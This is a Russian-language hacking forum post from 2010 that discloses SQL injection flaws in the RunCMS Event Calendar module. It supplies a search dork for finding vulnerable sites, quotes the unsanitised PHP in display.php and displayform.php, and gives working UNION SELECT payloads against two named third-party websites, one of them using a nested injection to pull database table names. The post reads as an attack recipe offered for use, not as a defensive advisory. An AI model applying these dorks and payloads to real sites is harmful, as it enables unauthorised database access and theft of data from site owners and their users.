Показать сообщение отдельно
Старый 06.07.2010, 17:13   #6
nikp
Banned
 
Регистрация: 05.07.2010
Сообщений: 201
Репутация: 183
По умолчанию

Модуль Event Calendar (rc2m1-ecal-beta2.01) 25-2-2010 Updatet with bug fix to stop addlocation bug!
http://www.runcms.org/modules/mods/
dork inurl:"modules/ecal/"

Уязвимости во многом остались прежними, смотрим обзор BlackSun`а, добавлю только:
modules/ecal/display.php
PHP код:
...
$katid = !empty( $_POST['katid']) ?  $_POST['katid'] :  $_GET['katid'];
...
if (
$katid) {
    
$abfrage =" stamp >= \"$year1-$month1-$day1 00:00:00\" AND cid=$katid AND valid ='yes'";
    
$kat1 $db->query("SELECT title, cid FROM ".$db->prefix("ecal_cat")." where cid=$katid");
    list(
$kattitle) = $db->fetch_row($kat1);
...
        
$query $db->query("SELECT * FROM ".$db->prefix("ecal")." WHERE $abfrage ORDER BY stamp");
        
$results=$db->num_rows($query);
        
        if (!
$results ) {
            echo 
"<BR><CENTER><B>"._NOEVENTDAY."</B></CENTER><BR>";
        } else {
        while (
$row $db->fetch_array($query)){
                        
            
$nomuser $row['username'];
             
$auteur $db->query("SELECT uid FROM ".$db->prefix("users")." where uname='$nomuser'");
            list(
$uid) = $db->fetch_row($auteur);
            
            
$kat $db->query("SELECT title, cid FROM ".$db->prefix("ecal_cat")." where cid=".$row['cid']);
            
$kategorie $db->fetch_array($kat);
            
            
$locat $db->query("SELECT lid, location, email, url FROM ".$db->prefix("ecal_location")." where lid=".$row['locationid']);
            
$location $db->fetch_array($locat);
            
            
$Calanddate $row['stamp'];
            
$Calanddate strftime(_EVEDATESTRING,strtotime($Calanddate));
            
$heurmin strftime(_EVETIME,strtotime($Calanddate));
            
$date strftime(_EVEDATESHORT,strtotime($Calanddate));
            
            include (
"include/displayform.php"); 
modules/ecal/include/displayform.php
PHP код:
            if ($row['privat'] == 0) {   //для поля 12 (nikp)
                
echo "<hr>";
                    echo 
"<table width='100%' class='bg2' border='0'><tr>";
                    echo 
"<td width='40%'><b>"._CAL_KATTERMIN."</b><a href='display.php?katid=".$kategorie['cid']."&day1=$currentday&month1=$currentmonth&year1=$currentyear&day=$day&month=$month&year=$year'>".$kategorie['title']."</a></td>";
                    echo 
"<td width='60%'><b>"._CAL_TITLE."</b> ".$row['subject']."</td>";
                    if (
$row['high'] == 1) {
                        echo 
"<td>"._CAL_TIPP."</td></tr></table>";
                    }
        
                    echo 
"<table width='100%' class='bg3' border='0'><tr>";
                    echo 
"<td width='10%'><b>"._CAL_AUTOR."</td>";
                    echo 
"<td width='20%'><a href='".RCX_URL."/userinfo.php?uid=".$uid."'><img src='language/".$rcxConfig['language']."/images/icon_profile.gif' border='0' width='59' height='18' ALT='".$row['username']."'></a></td>";
                    echo 
"<td width='10%'>&nbsp;</td>";
                    echo 
"<td width='60%'>&nbsp;</td></tr>";
// и т.д  вывод 
Многострочный вывод

SQL
mq=any
в поле 12 нужно поставить 0 (вывод для неавторизованного пользователя)

http://nkamsk.name/modules/ecal/display.php
post
katid=-1 union select 1,2,3,4,5,6,7,table_name,9,10,11,0,13,14 from information_schema.tables --

или с иньекцией для $row['cid']
http://scrap-info.ru/modules/ecal/display.php
post
katid=-1 union select 1,"-1 union select database(),222",3,4,5,6,7,table_name,9,10,11,0,13,14 from information_schema.tables --
nikp вне форума   Ответить с цитированием